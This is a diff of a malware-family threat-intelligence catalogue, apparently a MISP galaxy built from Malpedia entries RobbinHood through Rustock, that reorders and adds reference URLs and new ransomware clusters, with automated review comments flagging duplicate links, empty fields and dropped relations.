- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/",
"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/"
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/",
+ "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/"
],
"synonyms": [
"RobbinHood"
@@ -39775,10 +41886,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader",
- "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
+ "https://intel471.com/blog/a-brief-history-of-ta505"
],
"synonyms": [],
"type": []
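Review bot: while this hunk only reorders, the RockLoader list still cites the same Intel 471 article twice under different hosts (`https://intel471.com/blog/a-brief-history-of-ta505` and `https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/`); dedupe to one canonical URL. The RogueRobin and RokRat lists below carry the same pattern with `kindredsec.wordpress.com` and `kindredsec.com`.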
@@ -39804,8 +41915,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin",
"https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"
],
@@ -39833,31 +41944,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat",
- "http://v3lo.tistory.com/24",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
- "https://unit42.paloaltonetworks.com/atoms/moldypisces/",
- "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
- "https://www.ibm.com/downloads/cas/Z81AVOY7",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf",
- "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
- "https://www.youtube.com/watch?v=uoBQE5s2ba4",
- "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
- "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48",
- "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
+ "https://asec.ahnlab.com/en/51751/",
+ "https://www.ibm.com/downloads/cas/Z81AVOY7",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
+ "https://www.youtube.com/watch?v=uoBQE5s2ba4",
+ "http://v3lo.tistory.com/24",
+ "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48",
+ "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
+ "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://twitter.com/ESETresearch/status/1575103839115804672",
+ "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
+ "https://unit42.paloaltonetworks.com/atoms/moldypisces/",
+ "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab"
],
"synonyms": [
"DOGCALL"
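Review bot: the RokRAT refs now contain the same Talos post twice, once as the unchanged `https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` and once as the added `http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html`; the http variant should be dropped, and the same applies to the kindredsec.wordpress.com / kindredsec.com pair, which is one article under two hosts. Separately, eighteen of the `-`/`+` lines in this hunk are a pure reorder of references that were already present, which hides the four genuinely new entries (asec.ahnlab.com, research.checkpoint.com, twitter.com/ESETresearch, medium.com/s2wblog); if the generator sorts the refs, it should do so deterministically so reorders stop appearing in every update.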
@@ -39867,6 +41982,23 @@
"uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5",
"value": "RokRAT"
},
+ {
+ "description": "ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast",
+ "https://www.mandiant.com/resources/sabbath-ransomware-affiliate"
+ ],
+ "synonyms": [
+ "Arcane",
+ "S4bb47h",
+ "Sabbath"
+ ],
+ "type": []
+ },
+ "uuid": "a3178bd5-719b-4065-9a55-d13bb34e5c14",
+ "value": "ROLLCOAST"
+ },
{
"description": "",
"meta": {
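Review bot: the new ROLLCOAST cluster leaves `"type": []` empty even though its own description identifies it as a ransomware program, so the type field should be populated to match the other ransomware entries in this galaxy. The synonyms `Arcane`, `S4bb47h` and `Sabbath` are consistent with the Mandiant reference title (sabbath-ransomware-affiliate), so those look right; the description also states the DLL has a single ordinal export `0x01`, which is worth keeping as a concrete hunting attribute rather than prose-only text if the schema allows it.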
@@ -39887,6 +42019,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat",
+ "https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries",
+ "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
+ "https://cert.gov.ua/article/3349703",
"https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/"
],
"synonyms": [],
@@ -39912,14 +42047,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rook",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/",
- "https://seguranca-informatica.pt/rook-ransomware-analysis/",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
"https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md",
"https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/",
+ "https://seguranca-informatica.pt/rook-ransomware-analysis/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [],
"type": []
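Review bot: after this reorder the Rook refs still list the Microsoft ransomware-as-a-service post twice, as `.../how-to-protect-yourself/` (with trailing slash) and `.../how-to-protect-yourself` (without); both lines are re-added by the hunk, so this was the moment to collapse them into one. The rest of the hunk is a no-op reorder of references that were already present.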
@@ -39939,6 +42074,38 @@
"uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9",
"value": "Roopirs"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "68050d50-eece-43ba-8668-0825eab940f0",
+ "value": "Roopy"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach",
+ "https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html",
+ "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
+ "https://www.group-ib.com/blog/bablock-ransomware/",
+ "https://medium.com/@simone.kraus/rorschach-ransomware-analysis-with-attack-flow-7fa5ff613a75",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/d/an-analysis-of-the-bablock-ransomware-/iocs-an-analysis-of-the-babLock-ransomware.txt"
+ ],
+ "synonyms": [
+ "BabLock"
+ ],
+ "type": []
+ },
+ "uuid": "86c3434c-ca86-4109-b0fc-61d14d59505c",
+ "value": "Rorschach Ransomware"
+ },
{
"description": "",
"meta": {
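Review bot: both new clusters (Roopy and Rorschach Ransomware) ship with `"description": ""` and `"type": []`, although the references supplied make the classification obvious in at least the Rorschach case (Check Point and Trend Micro both describe it as ransomware, and the `BabLock` synonym is supported by the Trend Micro and Group-IB titles). A one-line description and a type value for each would make these entries consistent with the populated clusters elsewhere in this file.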
@@ -39959,7 +42126,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.roshtyak",
- "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/"
+ "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/",
+ "https://unit42.paloaltonetworks.com/unsigned-dlls/",
+ "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/"
],
"synonyms": [],
"type": []
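Review bot: the added Trend Micro reference for Roshtyak uses the `fr_fr` locale path (`https://www.trendmicro.com/fr_fr/research/22/l/...`), whereas the other Trend Micro references in this file use `en_us`; pointing at the English edition keeps the reference set consistent and avoids a locale-specific URL that may redirect.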
@@ -39972,8 +42142,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt",
- "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html",
- "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/"
+ "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/",
+ "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html"
],
"synonyms": [
"RotoCrypt",
@@ -39989,8 +42159,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rover",
- "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/"
],
"synonyms": [],
"type": []
@@ -40003,15 +42173,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix",
- "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf",
- "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
- "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
- "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
- "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
- "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
"https://securelist.com/oh-what-a-boot-iful-mornin/97365",
+ "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
+ "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
+ "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
+ "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
+ "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
+ "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/"
],
@@ -40022,15 +42192,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a4036a28-3d94-11e8-ad9f-97ada3c6d5fb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f",
"value": "Rovnix"
},
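Review bot: this hunk silently removes the Rovnix `related` block, dropping a `similar` relation to `a4036a28-3d94-11e8-ad9f-97ada3c6d5fb` tagged as almost-certain. Nothing in the diff shows that target cluster being removed, so either the relation should stay or the commit message should say why the cross-reference is being dropped; consumers that walk galaxy relations will lose this link otherwise.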
@@ -40040,22 +42201,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
"https://github.com/nccgroup/Royal_APT",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ac04d0b0-c6b5-4125-acd7-c58dfe7ad4cf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72",
"value": "RoyalCli"
},
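Review bot: same concern as for Rovnix, the RoyalCli `related` entry pointing at `ac04d0b0-c6b5-4125-acd7-c58dfe7ad4cf` is deleted without justification; unless that target cluster no longer exists, the relation should be kept. The remaining changes in this hunk only swap the order of existing references, and note that `research.nccgroup.com/2018/03/10/apt15-...` and `www.nccgroup.trust/uk/.../2018/march/apt15-...` are the same NCC Group article at two hosts.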
@@ -40065,9 +42217,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
"https://github.com/nccgroup/Royal_APT",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
@@ -40075,14 +42227,49 @@
"uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a",
"value": "Royal DNS"
},
+ {
+ "description": "Ransomware",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html",
+ "https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/",
+ "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html",
+ "https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/",
+ "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/",
+ "https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal",
+ "https://www.coalitioninc.com/blog/active-exploitation-firewalls",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/royal-ransomware/",
+ "https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://securityscorecard.pathfactory.com/research/the-royal-ransomware",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware",
+ "https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a",
+ "https://socradar.io/dark-web-profile-royal-ransomware/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.cybereason.com/blog/royal-ransomware-analysis"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "df1baad8-e4b6-4507-964c-6e9a8dd5252c",
+ "value": "Royal Ransom (Windows)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena",
+ "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor",
"https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/",
"https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors",
- "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor",
"https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena"
],
"synonyms": [],
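Review bot: the new Royal Ransom (Windows) cluster lists the same ACSC advisory twice, as `https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal` and `https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal` (old and new site paths for one document); keep one. The description is just "Ransomware", which is thinner than the references support, and since the value is scoped to "(Windows)" while the Trend Micro reference covers the Linux/ESXi variant, it would help to state in the description whether the Linux variant is tracked here or in a separate cluster. The Rozena change below is a pure reorder.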
@@ -40096,14 +42283,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm",
- "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
- "https://www.youtube.com/watch?v=YXnNO3TipvM",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
"https://jonahacks.medium.com/malware-analysis-manual-unpacking-of-redaman-ec1782352cfb",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
"http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html",
- "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/"
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.youtube.com/watch?v=YXnNO3TipvM",
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/"
],
"synonyms": [
"Redaman"
@@ -40113,13 +42300,28 @@
"uuid": "e6952b4d-e96d-4641-a88f-60074776d553",
"value": "RTM"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/read-the-manual-locker-a-private-raas-provider.html"
+ ],
+ "synonyms": [
+ "Read The Manual Locker"
+ ],
+ "type": []
+ },
+ "uuid": "b299d033-7772-44a6-a8e0-6b8c5f8af5c6",
+ "value": "RTM Locker"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
- "http://reversing.fun/posts/2022/01/30/rtpos.html"
+ "http://reversing.fun/posts/2022/01/30/rtpos.html",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf"
],
"synonyms": [],
"type": []
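Review bot: the new RTM Locker cluster has an empty description, and because the existing `RTM` cluster (Redaman banking trojan) sits directly above it, a one-sentence description explaining that RTM Locker is a ransomware-as-a-service locker (as the Trellix reference title indicates) would prevent analysts from conflating the two; a populated `type` would help for the same reason. The rtpos portion of the hunk is a reorder only.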
@@ -40137,15 +42339,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d70bd6a8-5fd4-42e8-8e39-fb18daeccdb2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2",
"value": "Ruckguv"
},
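Review bot: the Ruckguv `related` block pointing at `d70bd6a8-5fd4-42e8-8e39-fb18daeccdb2` is removed with nothing else in the hunk explaining the deletion; as with the other `related` removals in this patch, either keep the relation or document in the commit message that the target cluster was retired.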
@@ -40162,25 +42355,28 @@
"value": "Rumish"
},
{
- "description": "",
+ "description": "NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ ],
+ "synonyms": [
+ "running_rat"
],
- "synonyms": [],
"type": []
},
"uuid": "b746a645-5974-44db-a811-a024214b7fba",
- "value": "running_rat"
+ "value": "Running RAT"
},
{
"description": "RURansom shows characteristics of typical ransomware, but despite its name, TrendMicro's assumptions after analysis showed that this malware is more a wiper than ransomware, because the irreversible destruction of encrypted files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ruransom",
+ "https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/",
"https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html",
- "https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html",
- "https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/"
+ "https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html"
],
"synonyms": [],
"type": []
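Review bot: renaming `"value": "running_rat"` to `"value": "Running RAT"` changes the cluster's display name, which any existing tags or correlations keyed on the old value will no longer match; keeping the uuid unchanged and adding `running_rat` as a synonym mitigates this, but the rename should be called out in the commit message. In the new description, "anti-bugging techniques" is most likely a transcription of "anti-debugging" from the NJCCIC source and should be verified against it. The RURansom change below is a reorder of existing references only.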
@@ -40208,16 +42404,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock",
- "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
+ "https://darknetdiaries.com/episode/110/",
"http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html",
"https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/",
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html",
+ "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
"https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://darknetdiaries.com/episode/110/",
- "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf",
- "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/",
"https://www.secureworks.com/blog/research-21041",
- "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf"
+ "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/",
+ "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf",
